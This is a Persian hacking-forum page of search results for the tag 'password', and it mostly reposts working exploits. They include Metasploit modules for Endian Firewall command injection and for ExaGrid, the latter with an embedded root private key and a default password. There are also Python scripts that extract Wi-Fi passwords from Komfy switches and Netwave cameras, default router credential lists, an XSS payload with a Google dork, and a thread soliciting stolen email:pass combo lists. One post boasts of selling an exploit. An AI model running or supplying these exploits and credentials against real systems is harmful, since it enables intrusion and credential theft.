امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'password'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

25 نتیجه پیدا شد

  1. Moeein Seven

    Hacking

    دوره آموزشی Password attacks از فرانش قیمت 20000 کاری از بهروز منصوری Password attacks.rar - Telegram File Download Service Password attacks.rar - Telegram File Download Service
  2. با سلام این اکسپلوت در این سایت به فروش رسید به قیمت 100 دلار افتخار دگیر از تیم امنیتی ما که ابزار هامون برای فروش گذاشته شده تبریک به رضا گل # Exploit Title: Latest ZTE F609 Indihome Router Password Default # Google Dork:"ZTE F609 IP Addresses 192.168.1.1" # Date: 02/10/2018 # Exploit Author:Rednfozi # Vendor Homepage:http://setuprouter.com/router/zte/f609/login.htm # Software Link: N/A # Version: ZTE F609 # Tested on: win # CVE : N/A # Team: https://www.exploit-db.com/author/?a=2243 # mypege https://cxsecurity.com/author/Inj3ct0r/1/ # me:Inj3ctor@gmx.us ***************************************************************| |[+] Exploit :info # 1. Description: Latest ZTE F609 Indihome Router Password Default - Telkom regularly changes their ZTE F609 Indihome router password. Well, this action can be used because it turns out that the password used in several locations is the same. log in to the ZTE F609 router. Okay, right, yes, here is a list that you can try: Login to the ZTE F609 Router Find Your ZTE F609 Router IP Address We need to know the Internal IP Address of your ZTE F609 router before we can login to it. ZTE F609 IP Addresses 192.168.1.1 |--------------------------------------------------------------| |[+] sername : user password : user username : admin password : Pq@54r!e8ow&q#u username : admin password : Dj9@t!n03g4r6#f username : admin password : admin username : admin password : telkomjatineg4r4 username : admin password : Telkomdso123 Well, if you successfully log in, it looks: http://setuprouter.com/router/zte/f609/login.htm Okay share this time. If there is an update password, or another password that works in your area, please comment so that later I will include it in the post so that in the future this article will |--------------------------------------------------------------| **************************************************************** Discovered by : Rednfozi Thanks To: ReZa CLONER , Moeein Seven Inj3ct0r .soldier anonymous. milad shadow https://0days.info/?exp=9661346 http://www.exploit4arab.org/exploits/2086
  3. SEC Consult Vulnerability Lab Security Advisory < 20181001-0 > ======================================================================= title: Password disclosure vulnerability & XSS product: PTC ThingWorx vulnerable version: 6.5-7.4, 8.0.x, 8.1.x, 8.2.x fixed version: see Solution section CVE number: CVE-2018-17216, CVE-2018-17217, CVE-2018-17218 impact: critical homepage: https://www.ptc.com found: 2018-03-13 by: M. Tomaselli (Office Munich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "ThingWorx is more than an IoT platform; it provides the functionality, flexibility and scalability that businesses need to drive industrial innovationaincluding the ability to source, contextualize and synthesize data while orchestrating processes and delivering powerful web, mobile and AR experiences." Source: https://www.ptc.com/en/thingworx8 Business recommendation: ------------------------ ThingWorx allows to configure Things to communicate with other services over several protocols (e.g. LDAP integration via a DirectoryServices Thing). In order to communicate with services that require authentification, ThingWorx provides functionality to associate credentials to a Thing. During a brief audit it was noticed that ThingWorx Composer leaks the following sensitive data: 1) The PBKDF2WithHmac512 password hash of a user Thing 2) The AES encrypted password of several Things containing password attributes Furthermore, the password used for encryption is hard-coded and thus identical along all installations. Besides the above mentioned vulnerabilities a reflected cross-site scripting vulnerability was identified in the ThingWorx SQUEAL search function. The vendor provides a patch which should be installed immediately. It is recommended to perform further thorough security audits as the product may be affected by other potential security vulnerabilities. Vulnerability overview/description: ----------------------------------- 1) Disclosure of User Password Hashes to Privileged Users (CVE-2018-17216) ThingWorx discloses the PBKDF2WithHmac512 hashed passwords of its application users when doing exports with an administrative account. This enables an attacker to conduct offline brute-force or dictionary attacks against the obtained password hashes. 2) Disclosure of Encrypted Credentials and Use of Hard-Coded Passwords (CVE-2018-17217) A critical information disclosure vulnerability leaks the AES encrypted passwords of services configured within ThingWorx. Due to a hard-coded master password in the SecureData class, an attacker is able to decrypt the obtained passwords which grants him access to other services. The AES encrypted password gets disclosed in the server response when a user/attacker visits a Thing that contains credentials. 3) Reflected Cross-Site Scripting (CVE-2018-17218) The JavaScript part of the ThingWorx SQUEAL search functionality (searchExpression parameter) which is responsible for parsing the obtained JSON response fails to properly sanitize user supplied input. If the victim views attacker-prepared content (e.g. on a website or in an HTML email) an attacker is able to execute arbitrary actions in the context of its victims' sessions. Proof of concept: ----------------- The proof of concept has been removed from this advisory. Vulnerable / tested versions: ----------------------------- The vulnerabilities have been verified to exist in version 8.0.1-b39 which was the latest version available at the time of the test. The vendor provided further affected version information. See the Solution section for reference. Vendor contact timeline: ------------------------ 2018-03-14: Contacting vendor through email 2018-03-16: Advisory sent to vendor via encrypted mail 2018-03 - 2018-09: Multiple phone calls with PTC R&D department discussing release & multi-party disclosure 2018-08-15: Vendor provided private notifications to customers to give 45 days to upgrade 2018-10-01: Coordinated release of SEC Consult advisory Solution: --------- Best recommendation is to upgrade to the latest version of ThingWorx to version 8.3.2 (at time of writing). For newer verions, the issue of the hard coded password has been fixed and the SQUEAL function removed. The minimum upgrade to obtain mitigations for all 3 issues depends on the version of ThingWorx in use. For ThingWorx versions 6.5-7.4, upgrade to 7.4.14+ For ThingWorx version 8.0.x, upgrade to 8.0.12+ For ThingWorx version 8.1.x, upgrade to 8.1.7+ For ThingWorx version 8.2.x, upgrade to 8.2.4+ The vendor always recommends upgrading to the latest availabe service pack. See the following advisory by the vendor for further information: https://www.ptc.com/en/support/article?n=CS291004 Workaround: ----------- 1) Disclosure of User Password Hashes to Privileged Users To limit exposure, disabling all native ThingWorx users and solely rely on users that make use of Active Directory or Single Sign On (SSO) authentication, since the password hashes are then not saved within ThingWorx. 2) Disclosure of Encrypted Credentials and Use of Hard-Coded Passwords None. 3) Reflected Cross-Site Scripting This issue only exists because of a deprecated feature called SQUEAL. Removal of this function will eliminate the XSS issue. a. This SQUEAL functionality is already removed in ThingWorx 8.1.0+. b. For versions older than 8.1.0, a workaround is available at the PTC support site. Updating to fix all 3 issues is recommended. Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF M. Tomaselli / @2018
  4. Title: Borland's InterBase 7.1 poor Password Data File Permissions and Password Hash Author: Larry W. Cashdollar, @_larry0 Date: 2003-11-26 CVE-ID:[CVE-2004-1833] Download Site: http://www.borland.com/interbase Vendor: Borland Vendor Notified: 2003-11-26 Vendor Contact: disclosed via idefense Advisory: http://www.vapid.dhs.org/advisories/borland_interbase_db_vulnerablities.html Description: Borland InterBase raises the bar for performance and power in small footprint databases. Designed for use in situations where there is no database administrator or IT support, InterBase is powerful enough to support mission-critical applications, yet compact enough to run on very modest systems. It can be easily transported by disk, CD, or even dial-up download. And unlike enterprise databases that require expensive ecosystems of support and maintenance, InterBase requires virtually no maintenance. Vulnerability: The "information database" stored in the file admin4.pcb is read and writeable for all users with local access to the system. [root@Fester interbase]# ls -l /opt/interbase/admin.ib -rw-rw-rw- 1 root root 616497 Nov 20 10:04 /opt/interbase/admin.ib Not only is the password file stored read writeable by all local users but the password hash is done with one salt "9z" and then hashed again. As an addition to the permissions issue, I thought I should flesh out the fact that the double crypt() does not add any security to the hash with out the salt. The purpose of the salt is so that the same passwords dont always have the same hashes. With them removing the salt the hashes will always be the same for the same password reguardless of crypt() being called twice. This can be expressed in this line pesudo C: crypt(&crypt(user_password,"9z")[2],"9z") Exploit Code: Local attackers can exploit this vulnerability to add or modify accounts in Interbase. The following C program will generate hashed passwords that can be injected into admin.ib database. /*Larry W. Cashdollar Vapid Labs. Borland Interbase 7.1 password creator. lwc@vapid.dhs.org */ #include <stdio.h> #include <unistd.h> #define SALT "9z" int main (int argc, char *argv[]) { char crypt1,crypt2; if (!argv[1]) { printf ("Borland InterBase db password tool.\n Larry Cashdollar, vapid labs\nEnter desired password as an argument\n"); exit(); } crypt1 =(char *) crypt (argv[1],SALT); crypt2 =(char *) crypt (&crypt1[2],SALT); printf("Double crypt() is: %s\n",crypt2); printf("With out salt (as stored in isc4.gdb/admin.ib: %s\n",&crypt2[2]); return(0); }
  5. ############################################ # Title : user and password of the American Recovery site XSS Vulnerability # Author :Rednofozi # category : webapps # Tested On : Win 8 , Kali Linux # my team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :https://www.diamondcard.us # Google Dork: inurl:''/.php?pass=' site:us ############################################ # search google Dork :inurl:''/.php?pass=' site:us ####################Proof of Concept ############# #Demo and test : https://www.diamondcard.us/download/api/example.php' (xxsVulnerability) <script>alert("rednofozi")</script> # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/1982
  6. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Endian Firewall Proxy Password Change Command Injection', 'Description' => %q{ This module exploits an OS command injection vulnerability in a web-accessible CGI script used to change passwords for locally-defined proxy user accounts. Valid credentials for such an account are required. Command execution will be in the context of the "nobody" account, but this account had broad sudo permissions, including to run the script /usr/local/bin/chrootpasswd (which changes the password for the Linux root account on the system to the value specified by console input once it is executed). The password for the proxy user account specified will *not* be changed by the use of this module, as long as the target system is vulnerable to the exploit. Very early versions of Endian Firewall (e.g. 1.1 RC5) require HTTP basic auth credentials as well to exploit this vulnerability. Use the USERNAME and PASSWORD advanced options to specify these values if required. Versions >= 3.0.0 still contain the vulnerable code, but it appears to never be executed due to a bug in the vulnerable CGI script which also prevents normal use (http://jira.endian.com/browse/UTM-1002). Versions 2.3.x and 2.4.0 are not vulnerable because of a similar bug (http://bugs.endian.com/print_bug_page.php?bug_id=3083). Tested successfully against the following versions of EFW Community: 1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2. Should function against any version from 1.1 RC5 to 2.2.x, as well as 2.4.1 and 2.5.x. }, 'Author' => [ 'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module ], 'References' => [ ['CVE', '2015-5082'], ['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082'], ['EDB', '37426'], ['EDB', '37428'] ], 'Privileged' => false, 'Platform' => %w{ linux }, 'Payload' => { 'BadChars' => "\x00\x0a\x0d", 'DisableNops' => true, 'Space' => 2048 }, 'Targets' => [ [ 'Linux x86', { 'Platform' => 'linux', 'Arch' => ARCH_X86, 'CmdStagerFlavor' => [ :echo, :printf ] } ], [ 'Linux x86_64', { 'Platform' => 'linux', 'Arch' => ARCH_X86_64, 'CmdStagerFlavor' => [ :echo, :printf ] } ] ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 10443 }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 28 2015', 'License' => MSF_LICENSE )) register_options([ OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script', '/cgi-bin/chpasswd.cgi']), OptString.new('EFW_USERNAME', [true, 'Valid proxy account username for the target system']), OptString.new('EFW_PASSWORD', [true, 'Valid password for the proxy user account']), OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']) ], self.class) register_advanced_options( [ OptInt.new('HTTPClientTimeout', [ true, 'HTTP read response timeout (seconds)', 5]) ], self.class) end def exploit # Cannot use generic/shell_reverse_tcp inside an elf # Checking before proceeds if generate_payload_exe.blank? fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, " + "please select a native payload") end execute_cmdstager(:linemax => 200, :nodelete => true) end def execute_command(cmd, opts) cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod") req(cmd) end def req(cmd) sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};" post_data = Rex::MIME::Message.new post_data.add_part('change', nil, nil, 'form-data; name="ACTION"') post_data.add_part(datastore['EFW_USERNAME'], nil, nil, 'form-data; name="USERNAME"') post_data.add_part(datastore['EFW_PASSWORD'], nil, nil, 'form-data; name="OLD_PASSWORD"') post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_1"') post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_2"') post_data.add_part(' Change password', nil, nil, 'form-data; name="SUBMIT"') data = post_data.to_s boundary = post_data.bound referer_url = "https://#{datastore['RHOST']}:#{datastore['RPORT']}" + "#{datastore['TARGETURI']}" res = send_request_cgi( { 'method' => 'POST', 'uri' => datastore['TARGETURI'], 'ctype' => "multipart/form-data; boundary=#{boundary}", 'headers' => { 'Referer' => referer_url }, 'data' => data }) if res if res.code == 401 fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Received a 401 HTTP response - " + "specify web admin credentials using the USERNAME " + "and PASSWORD advanced options to target this host.") end if res.code == 404 fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Received a 404 HTTP response - " + "your TARGETURI value is most likely not correct") end end end end
  7. ReZa CLONER

    Cracking

    درود در این تاپیک کمبو لیست های ایرانی و خارجی خودتون رو قرار بدید قوانین تاپیک: 1- لیستتون رو فقط بصورت کد یا لینک دانلود قرار بدین (تا جای امکان در داخل انجمن آپلود کنید) 2- حتما email:pass یا user:pass بودن لیستتون رو مشخص کنید 3- از اسپم خودداری کنید
  8. Moeein Seven

    Soft-Windows

    دانلود این نرم افزار برای ویندوز https://www.microsoft.com/en-us/store/p/lastpass-free-password-manager/9nblggh4v7x0
  9. ? شما در این روش یک تصویر دلخواه انتخاب میکنید مثلا تصویری از حیات وحش با انبوهی از حیوانات ،سپس موس یا با انگشت بروی نقاط دلخواهی کلیک کرده یا به صورت ثابت خط میکشید و پس از آن این نقاط رمز عبور شما خواهد بود؛ و هر بار در هنگام ورود شما باید این نقاط را دوباره مانند دفعه قبل مشخص کنید تا اجازه ورود به سیستم به شما داده شود. بدین منظور : ?ابتدا از صفحه اصلی نمایه Metro، بر روی Control Panel کلیک کنید. در محیط Control Panel، به قسمت Users رفته و بر روی Create a Picture Password کلیک کنید. ?رمز عبوری که برای حساب کاربری خود تعیین کرده‌اید را تایپ نمایید. اطمینان پیدا کنید حتماً برای حساب کاربری خود قبلاً حتماً رمز عبوری تعیین نموده باشید، چرا که در غیر این صورت امکان ساخت رمز عبور تصویری وجود ندارد. ?در صفحه بعد بر روی Choose picture کلیک کنید. تصویری را به دلخواه خود انتخاب نمایید و بر روی دکمه Open کلیک کنید ، سپس بر روی Use this picture کلیک نمایید. ?اکنون شما می‌توانید در سه مرحله، خط یا نقطه فرضی مورد نظر خود را بر روی قسمتی از عکس که مد نظرتان است رسم نمایید. با هر بار رسم خط یا نقطه، به طور خودکار وارد مرحله بعد می‌شوید. این کار را در نهایت بایستی یک ‌بار دیگر برای تأیید این رمز عبور تصویری انجام دهید. در پایان بر روی دکمه OK کلیک کنید. ?حالا اگر قصد ورود مجدد به حساب کاربری خود را داشته باشید بایستی که این رمز عبور تصویری را وارد کنید؛ و در صورت فراموش کردن رمز عبور تصویری می توانید از رمز عبور تایپی استفاده نمایید.
  10. # Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on Adsl Modems # Date: 10.11.2015 # Exploit Author: Murat Sahin (@murtshn) # Vendor Homepage: Huawei # Version: HG630a and HG630a-50 # Tested on: linux,windows Adsl modems force you to change admin web interface password. Even though you can change admin password on the web interface, the password you assign does not apply to ssh. So, SSH password always will be 'Username:admin Password:admin'. Ex: *ssh admin@modemIP <admin@192.168.1.1>* admin@modemIP <admin@192.168.1.1>'s password:*admin* PTY allocation request failed on channel 0 ------------------------------ - -----Welcome to ATP Cli------ ------------------------------- ATP>? ? cls debug help save ? exit ATP>shell shell BusyBox vv1.9.1 (2013-12-31 16:16:20 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. # cat /proc/version cat /proc/version Linux version 2.6.30 (y00179387@localhost) (gcc version 4.4.2 (Buildroot 2010.02-git) ) #10 SMP PREEMPT Tue Dec 31 16:20:50 CST 2013 #
  11. Moeein Seven

    Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'net/ssh' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report include Msf::Exploit::Remote::SSH def initialize(info = {}) super(update_info(info, { 'Name' => 'ExaGrid Known SSH Key and Default Password', 'Description' => %q{ ExaGrid ships a public/private key pair on their backup appliances to allow passwordless authentication to other ExaGrid appliances. Since the private key is easily retrievable, an attacker can use it to gain unauthorized remote access as root. Additionally, this module will attempt to use the default password for root, 'inflection'. }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Privileged' => true, 'Targets' => [ [ "Universal", {} ] ], 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find', }, }, 'Author' => ['egypt'], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2016-1560' ], # password [ 'CVE', '2016-1561' ], # private key [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ] ], 'DisclosureDate' => "Apr 07 2016", 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'DefaultTarget' => 0 })) register_options( [ # Since we don't include Tcp, we have to register this manually Opt::RHOST(), Opt::RPORT(22) ], self.class ) register_advanced_options( [ OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) end # helper methods that normally come from Tcp def rhost datastore['RHOST'] end def rport datastore['RPORT'] end def do_login(ssh_options) begin ssh_socket = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh_socket = Net::SSH.start(rhost, 'root', ssh_options) end rescue Rex::ConnectionError return rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" return rescue ::Timeout::Error print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" return rescue Net::SSH::AuthenticationFailed print_error "#{rhost}:#{rport} SSH - Failed authentication" rescue Net::SSH::Exception => e print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" return end if ssh_socket # Create a new session from the socket, then dump it. conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash -i', true) ssh_socket = nil return conn else return false end end # Ghetto hack to prevent the shell detection logic from hitting false # negatives due to weirdness with ssh sockets. We already know it's a shell # because auth succeeded by this point, so no need to do the check anyway. module TrustMeItsAShell def _check_shell(*args) true end end def exploit payload_instance.extend(TrustMeItsAShell) factory = ssh_socket_factory ssh_options = { auth_methods: ['publickey'], config: false, use_agent: false, key_data: [ key_data ], port: rport, proxy: factory, non_interactive: true } ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG'] conn = do_login(ssh_options) unless is_success?(conn, true) ssh_options[:auth_methods] = ['password'] ssh_options[:password] = 'inflection' ssh_options.delete(:key_data) conn = do_login(ssh_options) is_success?(conn, false) end end def is_success?(conn,key_based) if conn print_good "Successful login" service_data = { address: rhost, port: rport, protocol: 'tcp', service_name: 'ssh', workspace_id: myworkspace_id, } credential_data = { username: 'root', private_type: ( key_based ? :ssh_key : :password ), private_data: ( key_based ? key_data : 'inflection' ), origin_type: :service, module_fullname: fullname, }.merge(service_data) core = create_credential(credential_data) login_data = { core: core, last_attempted: Time.now, }.merge(service_data) create_credential_login(login_data) handler(conn.lsock) true else false end end def key_data <<EOF -----BEGIN RSA PRIVATE KEY----- MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10 hIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa E1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA GSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ BWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg AciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y iYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs Ry45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj QAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz ebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG XLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk 86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg== -----END RSA PRIVATE KEY----- EOF end end
  12. #!/usr/bin/python # Exploit Title: Komfy Switch with Camera Wifi Password Disclosure via Bluetooth BLE # Date: Oct 13, 2016 # Exploit Author: Jason Doyle @_jasondoyle # Vendor Homepage: http://us.dlink.com/products/connected-home/komfy-switch-with-camera/ # HW Model: DKZ-201S/W # SW Version: 1.0 # Tested on: Ubuntu 16.04 LTS / Python 2.7 # Disclosure Timeline: 10/11/16 Reported vulnerability to D-Link # 10/11/16 D-Link responded - The Komfy switch will be discontinued 12/30/16. No fix planned. # Vulnerability Summary #It is possible for an unauthenticated, remote attacker to retrieve the Komfy device's associated wifi ssid and password over bluetooth (4.0/BLE). # Vulnerability Details #https://github.com/jasondoyle/Komfy-Switch-Wifi-Password-Disclosure # Author: Jason Doyle @_jasondoyle # Komfy Switch with Camera wifi password disclosure exploit script import re, base64 from bluepy.btle import Scanner from gattlib import GATTRequester #lookup table to unscramble base64Alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" # '=' used for padding komfy64Alphabet = "qazwersdfxcvbgtyhnmjklpoiu5647382910+/POIKLMJUYTGHNBVFREWSDCXZAQ$" # '$' used for padding scanner = Scanner() devices = scanner.scan(5.0) bAddr = "" for dev in devices: if "6c:72:20" in dev.addr and dev.getValueText(1) and dev.getValueText(7) and dev.getValueText(9): bAddr = dev.addr print "[+] Komfy switch found: %s (%s), RSSI=%d dB" % (dev.addr, dev.addrType, dev.rssi) if not bAddr: print "No Komfy switches found" sys.exit(1) req = GATTRequester(bAddr.encode('ascii','ignore'), False, 'hci0') req.connect(True, 'public', 'none', 0, 78) #request SSID wifiSsid = req.read_by_uuid("0xb006")[0] reg = re.search(r"(:\s\"(.*)\")", wifiSsid) wifiSsid = reg.groups()[1].replace("\\","") #request komfy encoded wifi password wifiPassKomfy64 = req.read_by_uuid("0xb007")[0] reg = re.search(r"(:\s\"(.*)\")", wifiPassKomfy64) wifiPassKomfy64 = reg.groups()[1].replace("\\","") #convert password to real base64 wifiPassBase64 = "" for char in wifiPassKomfy64: i = komfy64Alphabet.index(char) wifiPassBase64 += base64Alphabet[i] wifiPass = base64.b64decode(wifiPassBase64) print "[+] Wifi password found for Komfy Switch [%s] SSID: %s Password: %s" % (bAddr, wifiSsid, wifiPass)
  13. Moeein Seven

    Hacking

    #!/bin/sh # # Acoem 01dB CUBE Smart Noise Monitoring Terminal # Remote Password Change # # HW version: LIS001A # Application FW: 2.34 # Metrology FW: 2.10 # Modem FW: 12.00.005 / 08.01.108 # # # Copyright 2016 (c) Todor Donev # <todor.donev at gmail.com> # https://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # # Disclaimer: # This or previous programs is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # Use them at your own risk! # # Thanks to Maya Hristova that support me. [todor@adamantium ~]$ GET "http://<TARGET>/ajax/F_validPassword.asp?NewPwd=<PASSWORD>"
  14. Moeein Seven

    Hacking

    !/usr/bin/python2.7 ## ## spiritnull(at)sigaint.org ## ## Run the exploit against the victim to get WIFI password ## If the victim is vulnerable to memory leak it will try to extract the username and password for the weblogin ## ## magic for you bash: ## wget -qO- http://[HOST]:[PORT]//proc/kcore | strings ## wget -qO- http://[HOST]:[PORT]//etc/RT2870STA.dat ## wget -qO- http://[HOST]:[PORT]//dev/rom0 ## wget -qO- http://[HOST]:[PORT]/get_status.cgi ## ## shodan dork: ## "Server: Netwave IP Camera" ## ## zoomeye dork: ## Netwave IP camera http config ## import sys,os,time,tailer import urllib2 import subprocess import signal from threading import Thread try: if sys.argv[1] == "-h" or sys.argv[1] == "--help": print "Usage: python pownetwave.py [HOST]:[PORT]" print "Example: python pownetwave.py 127.0.0.1:81" sys.exit(0) else: pass except IndexError: print "Usage: python pownetwave.py [HOST]:[PORT]" print "Example: python pownetwave.py 127.0.0.1:81" sys.exit(0) def signal_handler(signal, frame): print('\nclearing up..') os.system("rm -rf tmpstream.txt") os.system("rm -rf tmpstrings.out") os.system("killall -9 wget") os.system("killall -9 tail") sys.exit(0) signal.signal(signal.SIGINT, signal_handler) macaddr = "" done = 0 linecount = 0 class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' print "getting system information.."+sys.argv[1] response = urllib2.urlopen('http://'+sys.argv[1]+'/get_status.cgi') xcontent = response.read().split(";\n") for line in xcontent: if line.startswith("var id="): line = line.split("'") macaddr = line[1] else: pass print "victims MAC-ADDRESS: "+bcolors.OKGREEN+str(macaddr)+bcolors.ENDC print "getting wireless information.." try: resp = urllib2.urlopen("http://"+sys.argv[1]+"//etc/RT2870STA.dat") xcontent = resp.read().split("\n") print "victims wireless information.." for line in xcontent: if line.startswith("WPAPSK") or line.startswith("SSID"): print "\t\t"+bcolors.OKGREEN+str(line)+bcolors.ENDC else: print "\t\t"+str(line) except: print "wireless lan is disabled.." print "checking for memory dump vulnerability.." try: urllib2.urlopen('http://'+sys.argv[1]+'//proc/kcore') except: print bcolors.FAIL+"victim isnt vulnerable for a memory leak, exiting.."+bcolors.ENDC sys.exit(0) print "starting to read memory dump.. "+bcolors.WARNING+"this could take a few minutes"+bcolors.ENDC 